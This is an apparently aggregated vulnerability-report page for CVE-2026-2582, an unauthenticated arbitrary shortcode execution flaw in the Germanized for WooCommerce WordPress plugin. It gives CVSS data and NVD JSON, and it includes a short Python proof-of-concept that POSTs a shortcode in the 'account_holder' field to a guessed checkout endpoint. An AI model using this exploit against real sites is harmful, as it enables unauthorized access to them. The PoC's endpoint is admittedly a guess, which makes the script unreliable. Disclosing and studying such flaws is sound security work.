Security Vulnerability Report
中文
CVE-2026-2582 CVSS 6.5 MEDIUM

CVE-2026-2582

Published: 2026-04-14 07:16:07
Last Modified: 2026-04-22 20:23:16
Source: [email protected]

Description

The The Germanized for WooCommerce plugin for WordPress is vulnerable to arbitrary shortcode execution via 'account_holder' parameter in all versions up to, and including, 3.20.5. This is due to the software allowing users to execute an action that does not properly validate a value before running do_shortcode. This makes it possible for unauthenticated attackers to execute arbitrary shortcodes.

CVSS Details

CVSS Score
6.5
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N

Configurations (Affected Products)

No configuration data available.

Germanized for WooCommerce <= 3.20.5

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# PoC for CVE-2026-2582 Arbitrary Shortcode Execution # This script demonstrates the vulnerability by sending a payload with a malicious shortcode. import requests def exploit(target_url): # The vulnerable endpoint is typically related to the direct debit gateway processing. # Adjust the endpoint path based on the specific WordPress installation structure. url = f"{target_url}/checkout/" # Example endpoint, may vary # Payload containing a shortcode to be executed # Example: [gallery] or [contact-form-7 id="1"] or other installed shortcodes payload = { "account_holder": "[gallery]", # Other necessary parameters for the request might be needed depending on the form context } try: response = requests.post(url, data=payload) if response.status_code == 200: print("[+] Request sent successfully.") print("[+] Check the response to see if the shortcode (e.g., gallery images) was rendered.") print(response.text) else: print(f"[-] Request failed with status code: {response.status_code}") except Exception as e: print(f"[-] An error occurred: {e}") if __name__ == "__main__": target = "http://example.com" # Replace with the target URL exploit(target)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-2582", "sourceIdentifier": "[email protected]", "published": "2026-04-14T07:16:06.993", "lastModified": "2026-04-22T20:23:16.350", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The The Germanized for WooCommerce plugin for WordPress is vulnerable to arbitrary shortcode execution via 'account_holder' parameter in all versions up to, and including, 3.20.5. This is due to the software allowing users to execute an action that does not properly validate a value before running do_shortcode. This makes it possible for unauthenticated attackers to execute arbitrary shortcodes."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 2.5}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-94"}]}], "references": [{"url": "https://plugins.trac.wordpress.org/browser/woocommerce-germanized/tags/3.20.5/includes/gateways/direct-debit/class-wc-gzd-gateway-direct-debit.php#L214", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/woocommerce-germanized/tags/3.20.5/includes/gateways/direct-debit/class-wc-gzd-gateway-direct-debit.php#L982", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/9e6837ad-576f-4c25-9540-6144ddc8630e?source=cve", "source": "[email protected]"}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.